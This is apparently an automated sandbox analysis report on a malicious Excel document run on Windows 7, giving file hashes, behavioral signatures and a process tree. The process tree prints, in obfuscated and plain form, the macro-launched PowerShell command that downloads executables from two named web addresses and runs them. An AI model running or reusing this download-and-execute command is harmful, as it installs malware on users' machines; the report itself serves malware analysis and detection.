Analysis
-
max time kernel
26s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
22-07-2024 22:18
Behavioral task
behavioral1
Sample
522821904c650085320f9a9f229b69b9d61dd96cb5ea30782f62726f3dabf595.xls
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
522821904c650085320f9a9f229b69b9d61dd96cb5ea30782f62726f3dabf595.xls
Resource
win10v2004-20240704-en
General
-
Target
522821904c650085320f9a9f229b69b9d61dd96cb5ea30782f62726f3dabf595.xls
-
Size
50KB
-
MD5
be48c26f93d365d34256f295518f7c5f
-
SHA1
678bcb970e4b656ab4de7d92b3937d071f0fbf11
-
SHA256
522821904c650085320f9a9f229b69b9d61dd96cb5ea30782f62726f3dabf595
-
SHA512
a1d865d727fa270b759513e5472588b3045d948d4218a4043cfe3537a24231f5c93087da0eb8c7c4887c032e80693796858ba71d111373277a2e020bd19e5c5f
-
SSDEEP
768:cnvd4joBriV7prNEPrW+L7uXjNyEnQm0:cmjoBri3mzhPUJyY
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1672 1732 CMd.exe 29 -
Blocklisted process makes network request 1 IoCs
flow pid Process 6 564 powershell.exe -
pid Process 564 powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1732 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 564 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1732 EXCEL.EXE 1732 EXCEL.EXE 1732 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1732 wrote to memory of 1672 1732 EXCEL.EXE 30 PID 1732 wrote to memory of 1672 1732 EXCEL.EXE 30 PID 1732 wrote to memory of 1672 1732 EXCEL.EXE 30 PID 1732 wrote to memory of 1672 1732 EXCEL.EXE 30 PID 1672 wrote to memory of 564 1672 CMd.exe 32 PID 1672 wrote to memory of 564 1672 CMd.exe 32 PID 1672 wrote to memory of 564 1672 CMd.exe 32 PID 1672 wrote to memory of 564 1672 CMd.exe 32
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\522821904c650085320f9a9f229b69b9d61dd96cb5ea30782f62726f3dabf595.xls1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\CMd.exeCMd.exe /c "p^ow^Ers^hel^l^.e^xe^ -nO^l -No^Ni^Nt^ -W^IndOws^ 1 -NoprOFIle^ -ex^Ec^u B^Ypa^S^s -Wi^ 1 -N^O^Pr^ $random = N^ew-^O^b^je^ct^ Sy^st^em.^Ran^do^m; Fo^rea^ch($um in @({http://berurn.com/videos.exe},{http://rejmed.cz/tmp/visa.exe})) { t^ry { $fg = $ra^n^do^m.n^e^xt(0, 61132); $pp = '%appdata%\' + $fg + '.exe'; ^(^ne^w-^ob^jec^t s^ys^t^e^m.ne^t^.webcli^en^t)^.D^ow^nl^o^ad^Fi^le($um.ToString(), $pp); St^a^rt-^Pr^oce^ss $pp; b^re^ak; } c^at^ch { Wr^it^e-Ho^st $err^or[0].E^x^cep^ti^on } }"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowErshell.exe -nOl -NoNiNt -WIndOws 1 -NoprOFIle -exEcu BYpaSs -Wi 1 -NOPr $random = New-Object System.Random; Foreach($um in @({http://berurn.com/videos.exe},{http://rejmed.cz/tmp/visa.exe})) { try { $fg = $random.next(0, 61132); $pp = 'C:\Users\Admin\AppData\Roaming\' + $fg + '.exe'; (new-object system.net.webclient).DownloadFile($um.ToString(), $pp); Start-Process $pp; break; } catch { Write-Host $error[0].Exception } }3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-